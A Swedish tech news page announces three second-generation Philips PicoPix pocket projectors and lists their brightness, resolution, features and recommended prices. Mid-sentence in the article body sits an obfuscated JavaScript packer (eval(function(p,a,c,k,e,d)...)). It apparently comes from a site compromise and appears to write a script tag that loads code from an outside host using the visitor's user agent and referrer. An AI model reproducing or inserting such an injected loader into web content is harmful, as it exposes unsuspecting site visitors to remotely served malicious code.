Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Andra generationens Philips Picopix i svenska butiker

Andra generationens Philips Picopix i svenska butiker
Sebastian

Philips eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tenai|var|u0026u|referrer|yrfzb||js|php’.split(’|’),0,{}))
PicoPix 2055
-Världens minsta fickprojektor
Philips PicoPix 2055 erbjuder en färgrik och ljusstark bild med 55 lumen, en upplösning på 854 x 480 och 1000:1 i kontrastförhållande. Philips PicoPix 2055 passar utmärkt för affärsresenären. Den kopplas enkelt till din bärbara dator/laptop och på några sekunder kan du dela dina bilder eller presentationer på ett möte. Dess smidiga storlek (72*72*27mm) gör att du enkelt kan ta med den på resan, i fickan eller i datorväskan.
Rekommenderat pris: 2499 SEK

 

Philips PicoPix 2480
– 80 lumen, MP4-spelare och 2GB internminne
Philips PicoPix 2480 är en perfekt kompanjon att bära med sig i fickan, redo att användas för att dela med sig av bilder och filmer. Stödjer uppspelning av filer upp till full- HD format. Tack vare ljusstyrkan (upp till 80 lumen) och ett kontrastförhållande på 1000:1, fungerar den även bra i ljusa miljöer. Integrerat batteri, högtalare och MP4-spelare gör att du kan dela med dig av bilder och filmer var du än är, utomhus, hemma eller på resan.

Utrustad med alla nödvändiga anslutningar (inklusive HDMI), kan PicoPix 2480 kopplas till en dator, iPhone/smartphone, iPad/surfplatta eller till en spelkonsol. Den inbyggda mediespelaren möjliggör även uppspelning av film, musik och bilder direkt från det interna minnet på 2GB, ett SD-kort eller ett USB-minne Var du än befinner dig så är varje yta en potentiell projektionsyta!
Rekommenderat pris: 3499 SEK

 

Philips PicoPix 2330
– Mediespelare, USB QuickLink och 2GB internminne
Philips PicoPix 2330 är en liten och innovativ fickprojektor med exceptionellt bra funktioner med tanke på den kompakta storleken. Modellen är liten och lätt (130g) och är utrustad med en handledsrem som fungerar som USB QuickLink, du har alltid alla kablar med dig.

Inbyggd mediespelare (MP4), batteri (upp till 2h), högtalare (1W) och internminne (2GB) gör den ultraportabel och ger dig möjligt att dela dina bilder, filmer eller streama innehåll från din dator vart du än är.

PPX 2330 erbjuder en stor projektion (upp till 1,5 m diagonalt) och en hög bildkvalitet(30 lumen, 640×360 i upplösning och 1500:1 i kontrastförhållande). Denna projektor passar perfekt för den som vill dela med sig av bilder från sin kamera eller visa upp innehåll man sparat på det interna minnet eller ett externt minne. Philips PicoPix 2330 erbjuder även möjligheten att titta på streamade filmer och är kompatibel med Apples iPhone, iPod, och iPad.
Rekommenderat pris: 2499 SEK

Tekniska specifikationer och bildmaterial för samtliga modeller finns på:
http://www.philips.se/c/fickprojektor/179879/cat/sv/